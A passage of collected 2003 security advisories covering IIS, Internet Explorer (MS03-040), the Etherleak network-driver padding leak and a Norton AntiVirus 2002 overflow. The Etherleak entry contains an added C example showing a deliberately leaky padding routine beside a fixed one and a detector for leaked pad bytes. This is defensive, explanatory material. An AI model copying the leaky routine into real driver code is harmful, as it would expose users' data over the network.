 - The IIS Lockdown tool by default disables the ssinc.dll mapping, 
   which will block this attack. 
 - By default IIS 5.0 runs under a user account and not the system 
   account. Therefore an attacker who successfully exploited the 
   vulnerability would only gain user level permissions rather than 
   administrative level permissions. 
 - An attacker must have the ability to upload files to the IIS 
   Server. 

ASP Headers Denial of Service 
 - An attacker must have the ability to upload files to the IIS 
   server. 
 - IIS 5.0 will automatically restart after failing. 
 - IIS 5.1 and IIS 6.0 are not affected. 

WebDAV Denial of Service 
 - IIS 6.0 is not affected. 
 - IIS 5.0 and 5.1 will restart automatically after this failure. 
 - The IIS Lockdown tool disables WebDAV by default, which will 
   block this attack.

Patches

A patch is available to fix these vulnerabilities. Please read the 
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms03-018.asp
http://www.microsoft.com/security/security_bulletins/ms03-018.asp
for information on obtaining this patch.



Cumulative Patch for Internet Explorer

2003-10-03

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

Allows an attacker to run arbitrary code on a user's system with the 
privileges of the logged-on user. This is a cumulative patch that 
includes the functionality of all previously released patches for 
Internet Explorer 5.01, 5.5 and 6.0; in addition, it eliminates newly 
discovered vulnerabilities.

Overview

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server in a 
popup window. It could be possible for an attacker who exploited this
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the attacker
to exploit this vulnerability without any other user action. An 
attacker could also craft an HTML-based e-mail that would attempt to 
exploit this vulnerability.

A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server during 
XML data binding. It could be possible for an attacker who exploited 
this vulnerability to run arbitrary code on a user's system. If a 
user visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user action.
An attacker could also craft an HTML-based e-mail that would attempt 
to exploit this vulnerability.

A change has been made to the method by which Internet Explorer 
handles Dynamic HTML (DHTML) Behaviors in the Internet Explorer 
Restricted Zone. It could be possible for an attacker exploiting a 
separate vulnerability (such as one of the two vulnerabilities 
discussed above) to cause Internet Explorer to run script code in the 
security context of the Internet Zone. In addition, an attacker could 
use Windows Media Player's (WMP) ability to open URLs to construct 
an attack. An attacker could also craft an HTML-based e-mail that 
could attempt to exploit this behavior.

To exploit these flaws, the attacker would have to create a specially
formed HTML-based e-mail and send it to the user. Alternatively an 
attacker would have to host a malicious Web site that contained a Web
page designed to exploit these vulnerabilities. The attacker would 
then have to persuade a user to visit that site. 

As with the previous Internet Explorer cumulative patches released 
with bulletins MS03-004, MS03-015,  MS03-020, and MS03-032, this 
cumulative patch will cause window.showHelp( ) to cease to function 
if you have not applied the HTML Help update. If you have installed 
the updated HTML Help control from Knowledge Base article 811630, you
will still be able to use HTML Help functionality after applying this
patch. 

In addition to applying this security patch it is recommended that 
users also install the Windows Media Player update referenced in 
Knowledge Base Article 828026. This update is available from Windows 
Update as well as the Microsoft Download Center for all supported 
versions of Windows Media Player. While not a security patch, this 
update contains a change to the behavior of Windows Media Player's 
ability to launch URLs to help protect against DHTML behavior based 
attacks. Specifically, it restricts Windows Media Player's ability 
to launch URLs in the local computer zone from other zones.

Mitigating factors:
====================

 - By default, Internet Explorer on Windows Server 2003 runs in 
Enhanced Security Configuration. This default configuration of 
Internet Explorer blocks automatic exploitation of this attack. If 
Internet Explorer Enhanced Security Configuration has been disabled, 
the protections put in place that prevent this vulnerability from 
being automatically exploited would be removed. 
 - In the Web-based attack scenario, the attacker would have to host a 
Web site that contained a Web page used to exploit this 
vulnerability. An attacker would have no way to force a user to 
visit a malicious Web Site. Instead, the attacker would need to lure 
them there, typically by getting them to click a link that would take 
them to the attacker's site.
 - Exploiting the vulnerability would allow the attacker only the same 
privileges as the user. Users whose accounts are configured to have 
few privileges on the system would be at less risk than ones who 
operate with administrative privileges. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
http://www.microsoft.com/security/security_bulletins/MS03-040.asp



Some Network Drivers May Leak Data

2003-03-06

Risk level: medium

Type: Information leakage

Source of info: SGI Security Team

Impact

Many network device drivers reuse old frame buffer data to pad packets, resulting in an information leakage vulnerability that may allow remote attackers to harvest sensitive information from affected devices.

Overview

SGI acknowledges the network device driver vulnerability reported by AtStake
and is currently investigating:

http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
http://www.kb.cert.org/vuls/id/412115
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001

Our initial investigation shows that our egXX and tgXX gigabit cards and
efXX interfaces in Origins and Octanes don't appear to be vulnerable.

No further information is available at this time.  As further information
becomes available, additional advisories will be issued.

For the protection of all our customers, SGI does not disclose, discuss or
confirm vulnerabilities until a full investigation has occurred and any
necessary patch(es) or release streams are available for all vulnerable and
supported Linux and IRIX operating systems.

Until SGI has more definitive information to provide, customers are
encouraged to assume all security vulnerabilities as exploitable and take
appropriate steps according to local site security policies and
requirements.

As further information becomes available, additional advisories will be
issued via the normal SGI security information distribution methods
including the wiretap mailing list.
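The Impact paragraph of this entry describes the mechanism: a frame shorter
than the Ethernet minimum has to be padded before it goes on the wire, and
a driver that pads by transmitting whatever stale bytes sit in a reused
buffer leaks the previous frame's contents to the peer. The following is an
added example, not SGI's or @stake's code: a simulated transmit path with
the leaky padding next to the corrected one, and a check that counts
non-zero pad bytes in what went on the wire. The buffer sizes, function
names and the constructed frames are this example's assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ETH_ZLEN   60    /* minimum Ethernet frame on the wire, without FCS */
#define TX_BUF_LEN 1514  /* one full-size frame; one simulated transmit slot */

/* Simulated driver transmit buffer. In a real NIC driver this is a DMA
   buffer reused for every outgoing frame (assumption for this example). */
static unsigned char tx_buf[TX_BUF_LEN];

/* Vulnerable pattern, as described in the advisory: a short frame is
   "padded" by simply sending ETH_ZLEN bytes from the reused buffer, so
   whatever the previous frame left behind goes out as padding.
   Returns the number of bytes placed on the wire (0 if the frame is too big). */
size_t leaky_transmit(const unsigned char *frame, size_t len, unsigned char *wire)
{
    if (len > TX_BUF_LEN) return 0;
    memcpy(tx_buf, frame, len);
    size_t wire_len = len < ETH_ZLEN ? ETH_ZLEN : len;
    memcpy(wire, tx_buf, wire_len);          /* "DMA" to the wire */
    return wire_len;
}

/* Fixed pattern: clear the pad bytes explicitly before the frame leaves. */
size_t safe_transmit(const unsigned char *frame, size_t len, unsigned char *wire)
{
    if (len > TX_BUF_LEN) return 0;
    memcpy(tx_buf, frame, len);
    size_t wire_len = len;
    if (len < ETH_ZLEN) {
        memset(tx_buf + len, 0, ETH_ZLEN - len);
        wire_len = ETH_ZLEN;
    }
    memcpy(wire, tx_buf, wire_len);
    return wire_len;
}

/* Check for captured frames: count pad bytes beyond the declared length
   that are not zero. Any such byte is data that should not have left the host. */
size_t nonzero_pad_bytes(const unsigned char *wire, size_t declared_len, size_t wire_len)
{
    size_t n = 0;
    for (size_t i = declared_len; i < wire_len; i++)
        if (wire[i] != 0) n++;
    return n;
}

int main(void)
{
    unsigned char secret[200], ping[20], wire[TX_BUF_LEN];
    memset(secret, 'S', sizeof secret);  /* constructed: an earlier, larger frame */
    memset(ping, 'p', sizeof ping);      /* constructed: a short frame needing padding */

    leaky_transmit(secret, sizeof secret, wire);
    size_t n = leaky_transmit(ping, sizeof ping, wire);
    printf("leaky driver: %zu of %zu pad bytes carry old data\n",
           nonzero_pad_bytes(wire, sizeof ping, n), n - sizeof ping);

    safe_transmit(secret, sizeof secret, wire);
    n = safe_transmit(ping, sizeof ping, wire);
    printf("fixed driver: %zu of %zu pad bytes carry old data\n",
           nonzero_pad_bytes(wire, sizeof ping, n), n - sizeof ping);
    return 0;
}
```

Against a real capture, declared_len is the length the higher layer claims
(for IPv4, the 14-byte Ethernet header plus the IP total length) and
wire_len is the captured frame length; a steady stream of non-zero pad
bytes from a host is the signature the advisory's references describe.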





Symantec Norton AntiVirus 2002 Buffer Overflow Vulnerability

2003-02-19

Risk level: high

Type: Buffer overflow

Source of info: CERT

Impact

The e-mail scanning function in Symantec Norton AntiVirus 2002 may cause a Buffer Overflow.

Overview

The e-mail scanning function in Symantec Norton AntiVirus 2002 contains a buffer overflow that is triggered when it receives an e-mail message carrying a compressed file which includes a file with an unusually long filename.

An attacker could exploit this problem to execute arbitrary code with the privilege of the currently logged on user.